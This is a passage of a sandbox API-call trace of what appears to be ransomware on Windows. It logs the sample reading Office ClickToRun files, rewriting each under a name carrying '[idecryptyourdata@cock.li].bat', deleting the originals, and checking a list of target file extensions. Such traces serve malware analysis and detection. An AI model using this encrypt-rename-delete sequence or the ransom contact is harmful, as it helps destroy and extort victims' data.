nNumberOfBytesToWrite=0x7d0e0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x7d0e0, lpOverlapped=0x0) returned 1 [0181.209] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.209] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf6, lpOverlapped=0x0) returned 1 [0181.209] SetEndOfFile (hFile=0x35c) returned 1 [0181.209] CloseHandle (hObject=0x35c) returned 1 [0181.209] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.210] SetEndOfFile (hFile=0x358) returned 1 [0181.214] CloseHandle (hObject=0x358) returned 1 [0181.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.214] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll")) returned 1 [0181.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.215] lstrlenW (lpString=".doc") returned 4 [0181.215] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.215] lstrlenW (lpString=".docx") returned 5 [0181.215] lstrcmpiW (lpString1=".docx", lpString2="g.dll") returned -1 [0181.215] lstrlenW (lpString=".pdf") returned 4 [0181.215] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.215] lstrlenW (lpString=".xls") returned 4 [0181.215] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.215] lstrlenW (lpString=".xlsx") returned 5 [0181.215] lstrcmpiW (lpString1=".xlsx", lpString2="g.dll") returned -1 [0181.215] lstrlenW (lpString=".ppt") returned 4 [0181.215] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.215] lstrlenW (lpString=".zip") returned 4 [0181.215] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.215] lstrlenW (lpString=".rar") returned 4 [0181.215] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.215] lstrlenW (lpString=".bz2") returned 4 [0181.215] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.215] lstrlenW (lpString=".7z") returned 3 [0181.216] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.216] lstrlenW (lpString=".dbf") returned 4 [0181.216] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.216] lstrlenW (lpString=".1cd") returned 4 [0181.216] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.216] lstrlenW (lpString=".jpg") returned 4 [0181.216] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.216] lstrlenW (lpString=".doc") returned 4 [0181.216] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.216] lstrlenW (lpString=".docx") returned 5 [0181.216] lstrcmpiW (lpString1=".docx", lpString2="g.dll") returned -1 [0181.216] lstrlenW (lpString=".pdf") returned 4 [0181.216] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.216] lstrlenW (lpString=".xls") returned 4 [0181.216] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.216] lstrlenW (lpString=".xlsx") returned 5 [0181.216] lstrcmpiW (lpString1=".xlsx", lpString2="g.dll") returned -1 [0181.216] lstrlenW (lpString=".ppt") returned 4 [0181.216] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.216] lstrlenW (lpString=".zip") returned 4 [0181.216] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.216] lstrlenW (lpString=".rar") returned 4 [0181.217] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.217] lstrlenW (lpString=".bz2") returned 4 [0181.217] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.217] lstrlenW (lpString=".7z") returned 3 [0181.217] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.217] lstrlenW (lpString=".dbf") returned 4 [0181.217] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.217] lstrlenW (lpString=".1cd") returned 4 [0181.217] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.217] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll") returned 75 [0181.217] lstrlenW (lpString=".jpg") returned 4 [0181.217] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.218] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0181.218] lstrlenW (lpString="MavInject32.exe") returned 15 [0181.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.218] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=358616) returned 1 [0181.218] CloseHandle (hObject=0x358) returned 1 [0181.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe")) returned 0x20 [0181.218] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.218] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.219] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.219] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.219] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0181.219] GetLastError () returned 0x0 [0181.219] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x578d8, lpOverlapped=0x0) returned 1 [0181.338] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0x578e0, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0x578e0, lpOverlapped=0x0) returned 1 [0181.345] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x0, lpOverlapped=0x0) returned 1 [0181.345] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x389fc94, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesWritten=0x389fc94*=0xf2, lpOverlapped=0x0) returned 1 [0181.346] SetEndOfFile (hFile=0x35c) returned 1 [0181.346] CloseHandle (hObject=0x35c) returned 1 [0181.346] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0181.346] SetEndOfFile (hFile=0x358) returned 1 [0181.350] CloseHandle (hObject=0x358) returned 1 [0181.350] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.350] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mavinject32.exe")) returned 1 [0181.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.350] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.350] lstrlenW (lpString=".doc") returned 4 [0181.350] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0181.350] lstrlenW (lpString=".docx") returned 5 [0181.350] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0181.350] lstrlenW (lpString=".pdf") returned 4 [0181.350] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0181.350] lstrlenW (lpString=".xls") returned 4 [0181.350] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0181.350] lstrlenW (lpString=".xlsx") returned 5 [0181.351] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0181.351] lstrlenW (lpString=".ppt") returned 4 [0181.351] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0181.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.351] lstrlenW (lpString=".zip") returned 4 [0181.351] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0181.351] lstrlenW (lpString=".rar") returned 4 [0181.351] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0181.351] lstrlenW (lpString=".bz2") returned 4 [0181.351] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0181.351] lstrlenW (lpString=".7z") returned 3 [0181.351] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0181.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.351] lstrlenW (lpString=".dbf") returned 4 [0181.351] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0181.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.351] lstrlenW (lpString=".1cd") returned 4 [0181.351] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0181.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.351] lstrlenW (lpString=".jpg") returned 4 [0181.351] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0181.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.351] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.351] lstrlenW (lpString=".doc") returned 4 [0181.351] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0181.351] lstrlenW (lpString=".docx") returned 5 [0181.351] lstrcmpiW (lpString1=".docx", lpString2="2.exe") returned -1 [0181.351] lstrlenW (lpString=".pdf") returned 4 [0181.352] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0181.352] lstrlenW (lpString=".xls") returned 4 [0181.352] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0181.352] lstrlenW (lpString=".xlsx") returned 5 [0181.352] lstrcmpiW (lpString1=".xlsx", lpString2="2.exe") returned -1 [0181.352] lstrlenW (lpString=".ppt") returned 4 [0181.352] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0181.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.352] lstrlenW (lpString=".zip") returned 4 [0181.352] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0181.352] lstrlenW (lpString=".rar") returned 4 [0181.352] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0181.352] lstrlenW (lpString=".bz2") returned 4 [0181.352] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0181.352] lstrlenW (lpString=".7z") returned 3 [0181.352] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0181.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.352] lstrlenW (lpString=".dbf") returned 4 [0181.352] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0181.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.352] lstrlenW (lpString=".1cd") returned 4 [0181.352] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0181.352] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\MavInject32.exe") returned 73 [0181.352] lstrlenW (lpString=".jpg") returned 4 [0181.352] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0181.353] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.353] lstrlenW (lpString="mso40uires.dll") returned 14 [0181.353] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.353] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=3177152) returned 1 [0181.353] CloseHandle (hObject=0x358) returned 1 [0181.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll")) returned 0x20 [0181.353] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.354] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0181.355] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.355] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.355] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uires.dll")) returned 1 [0181.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.356] lstrlenW (lpString=".doc") returned 4 [0181.356] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.356] lstrlenW (lpString=".docx") returned 5 [0181.356] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0181.356] lstrlenW (lpString=".pdf") returned 4 [0181.356] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.356] lstrlenW (lpString=".xls") returned 4 [0181.356] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.356] lstrlenW (lpString=".xlsx") returned 5 [0181.356] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0181.356] lstrlenW (lpString=".ppt") returned 4 [0181.356] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.356] lstrlenW (lpString=".zip") returned 4 [0181.356] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.356] lstrlenW (lpString=".rar") returned 4 [0181.356] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.356] lstrlenW (lpString=".bz2") returned 4 [0181.356] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.356] lstrlenW (lpString=".7z") returned 3 [0181.356] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.357] lstrlenW (lpString=".dbf") returned 4 [0181.357] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.357] lstrlenW (lpString=".1cd") returned 4 [0181.357] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.357] lstrlenW (lpString=".jpg") returned 4 [0181.357] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.357] lstrlenW (lpString=".doc") returned 4 [0181.357] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.357] lstrlenW (lpString=".docx") returned 5 [0181.357] lstrcmpiW (lpString1=".docx", lpString2="s.dll") returned -1 [0181.357] lstrlenW (lpString=".pdf") returned 4 [0181.357] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.357] lstrlenW (lpString=".xls") returned 4 [0181.357] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.357] lstrlenW (lpString=".xlsx") returned 5 [0181.357] lstrcmpiW (lpString1=".xlsx", lpString2="s.dll") returned -1 [0181.357] lstrlenW (lpString=".ppt") returned 4 [0181.357] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.357] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.357] lstrlenW (lpString=".zip") returned 4 [0181.357] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.357] lstrlenW (lpString=".rar") returned 4 [0181.358] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.358] lstrlenW (lpString=".bz2") returned 4 [0181.358] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.358] lstrlenW (lpString=".7z") returned 3 [0181.358] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.358] lstrlenW (lpString=".dbf") returned 4 [0181.358] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.358] lstrlenW (lpString=".1cd") returned 4 [0181.358] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.358] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uires.dll") returned 72 [0181.358] lstrlenW (lpString=".jpg") returned 4 [0181.358] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.358] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0181.358] lstrlenW (lpString="mso40uiwin32client.dll") returned 22 [0181.358] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0181.359] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=9330784) returned 1 [0181.359] CloseHandle (hObject=0x358) returned 1 [0181.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll")) returned 0x20 [0181.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0181.359] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0181.360] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0181.360] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0181.360] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\mso40uiwin32client.dll")) returned 1 [0181.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.361] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.361] lstrlenW (lpString=".doc") returned 4 [0181.361] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0181.361] lstrlenW (lpString=".docx") returned 5 [0181.361] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0181.361] lstrlenW (lpString=".pdf") returned 4 [0181.361] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0181.361] lstrlenW (lpString=".xls") returned 4 [0181.361] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0181.361] lstrlenW (lpString=".xlsx") returned 5 [0181.362] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0181.362] lstrlenW (lpString=".ppt") returned 4 [0181.362] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0181.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.362] lstrlenW (lpString=".zip") returned 4 [0181.362] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0181.362] lstrlenW (lpString=".rar") returned 4 [0181.362] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0181.362] lstrlenW (lpString=".bz2") returned 4 [0181.362] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0181.362] lstrlenW (lpString=".7z") returned 3 [0181.362] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0181.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.362] lstrlenW (lpString=".dbf") returned 4 [0181.362] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0181.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.362] lstrlenW (lpString=".1cd") returned 4 [0181.362] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0181.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.362] lstrlenW (lpString=".jpg") returned 4 [0181.362] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0181.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.362] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\mso40uiwin32client.dll") returned 80 [0181.362] lstrlenW (lpString=".doc") returned 4 [0181.362] lstrcmpiW (lpString1=".doc", lpString2=".dll") 